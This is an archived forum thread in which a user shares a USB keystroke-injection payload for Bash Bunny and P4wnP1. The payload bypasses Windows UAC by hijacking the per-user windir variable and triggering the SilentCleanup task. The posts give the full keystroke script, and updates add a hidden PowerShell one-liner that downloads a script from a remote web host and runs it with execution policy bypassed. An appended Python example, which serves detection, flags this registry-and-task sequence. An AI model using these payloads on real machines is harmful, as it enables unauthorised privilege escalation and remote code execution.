
lokiuox uac bypass payload


KryptoKat


In theory, this Bash Bunny script should make a directory in C:\Windows called uac-bypassed. I have no way to test this specific script because I don't have a Bash Bunny or a Rubber Ducky, so I had to make do with a P4wnP1 A.L.O.A. Any help making this payload smaller would be greatly appreciated.
(The command at the bottom is for the P4wnP1 A.L.O.A.)

 

Q GUI R
Q powershell
Q ENTER
Q DELAY 500
Q "echo \"if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match `\"S-1-5-32-544`\")) { mkdir c:\\windows\\uac-bypassed } else { `$registryPath = `\"HKCU:\\Environment`\"; `$Name = `\"windir`\"; `$Value = `\"powershell -ep bypass -w h `$PSCommandPath;#`\"; Set-ItemProperty -Path `$registryPath -Name `$name -Value `$Value; schtasks /run /tn \\Microsoft\\Windows\\DiskCleanup\\SilentCleanup /I | Out-Null; Remove-ItemProperty -Path `$registryPath -Name `$name; }\" > uac.ps1"
Q ENTER
Q Set-ExecutionPolicy RemoteSigned -Scope CurrentUser
Q ENTER
Q DELAY 500
Q a
Q .\\uac.ps1
Q ENTER
Q rmdir uac.ps1
Q ENTER
Q Set-ExecutionPolicy Undefined -Scope CurrentUser
Q ENTER
Q DELAY 500
Q a
Q ENTER
Q exit
Q ENTER
P4wnP1_cli hid run -c 'layout("us"); typingSpeed(15,0); press("GUI R"); type("powershell"); press("ENTER"); delay(500); type(" echo \"if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match `\"S-1-5-32-544`\")) { mkdir c:\\windows\\uac-bypassed } else { `$registryPath = `\"HKCU:\\Environment`\"; `$Name = `\"windir`\"; `$Value = `\"powershell -ep bypass -w h `$PSCommandPath;#`\"; Set-ItemProperty -Path `$registryPath -Name `$name -Value `$Value; schtasks /run /tn \\Microsoft\\Windows\\DiskCleanup\\SilentCleanup /I | Out-Null; Remove-ItemProperty -Path `$registryPath -Name `$name; }\" > uac.ps1"); press("ENTER"); type("Set-ExecutionPolicy RemoteSigned -Scope CurrentUser"); press("ENTER"); delay(500); type("a"); press("ENTER"); type(".\\uac.ps1"); press("ENTER"); type("rmdir uac.ps1"); press("ENTER"); type("Set-ExecutionPolicy Undefined -Scope CurrentUser"); press("ENTER"); delay(500); type("a"); press("ENTER"); type("exit"); press("ENTER");'

---UPDATE---

I've simplified the script to:

powershell -w h curl -OutFile '%USERPROFILE%\uac.ps1' 'petrolic-designator.000webhostapp.com/uac.txt';

However, I'm having trouble running the file in the same line. Any help would be greatly appreciated.


---UPDATE---

I finally got the PowerShell script functioning. In theory, this should work on any account because everyone has access to C:\Windows\Temp.

powershell -w h -ep bypass curl -OutFile 'C:\Windows\Temp\uac.ps1' 'petrolic-designator.000webhostapp.com/uac.txt'; C:\Windows\Temp\uac.ps1

Now to find something useful to do with this.


Archived

This topic is now archived and is closed to further replies.
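
A detection-side view of the payload in this thread, added here as an example and not part of the original posts: the script writes a `windir` value under `HKCU:\Environment` and then starts the `SilentCleanup` task, so a per-user override of that variable followed by a manual task run is the sequence to alert on. The event records are constructed and simplified (Sysmon-style registry-set and process-create events), and the field names and the 60-second window are assumptions.

```python
import re
from datetime import datetime, timedelta

# Per-user override of a system path variable (Sysmon writes HKCU as HKU\<SID>).
ENV_OVERRIDE = re.compile(
    r"^HKU\\S-1-5-21-[\d-]+\\Environment\\(windir|systemroot)$", re.I)
# Manual start of the SilentCleanup scheduled task named in the post.
TASK_RUN = re.compile(r"schtasks(\.exe)?\b.*\s/run\b.*SilentCleanup", re.I)
WINDOW = timedelta(seconds=60)  # assumed correlation window

# Constructed, simplified records: event_id 13 = registry value set, 1 = process create.
SAMPLE_EVENTS = [
    {"event_id": 13, "time": "2024-01-01 10:00:00", "user": "alice",
     "target": r"HKU\S-1-5-21-1111-2222-3333-1001\Environment\windir",
     "details": r"powershell -ep bypass -w h C:\Users\alice\uac.ps1;#"},
    {"event_id": 1, "time": "2024-01-01 10:00:01", "user": "alice",
     "cmdline": r"schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I"},
    {"event_id": 13, "time": "2024-01-01 11:00:00", "user": "bob",
     "target": r"HKU\S-1-5-21-1111-2222-3333-1002\Environment\TEMP",
     "details": r"%USERPROFILE%\AppData\Local\Temp"},
    {"event_id": 1, "time": "2024-01-01 12:00:00", "user": "carol",
     "cmdline": r"schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup"},
    {"event_id": 13, "time": "2024-01-01 13:00:00", "user": "dave",
     "target": r"HKU\S-1-5-21-1111-2222-3333-1003\Environment\windir",
     "details": r"C:\Tools\run.cmd;#"},
]

def _ts(event):
    return datetime.strptime(event["time"], "%Y-%m-%d %H:%M:%S")

def find_windir_hijacks(events, window=WINDOW):
    """Alert on every per-user windir/systemroot override; raise severity to
    'high' when the same user starts SilentCleanup within `window` afterwards."""
    alerts = []
    for reg in events:
        if reg["event_id"] != 13 or not ENV_OVERRIDE.match(reg.get("target", "")):
            continue
        followed = any(
            e["event_id"] == 1 and e["user"] == reg["user"]
            and TASK_RUN.search(e.get("cmdline", ""))
            and timedelta(0) <= _ts(e) - _ts(reg) <= window
            for e in events)
        alerts.append({"user": reg["user"], "time": reg["time"],
                       "value": reg["details"],
                       "severity": "high" if followed else "medium"})
    return alerts

if __name__ == "__main__":
    for alert in find_windir_hijacks(SAMPLE_EVENTS):
        print(alert)
```

The override alone is reported at medium severity because the payload deletes the value again right after the task starts, so the registry write may be the only trace left in the hive.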
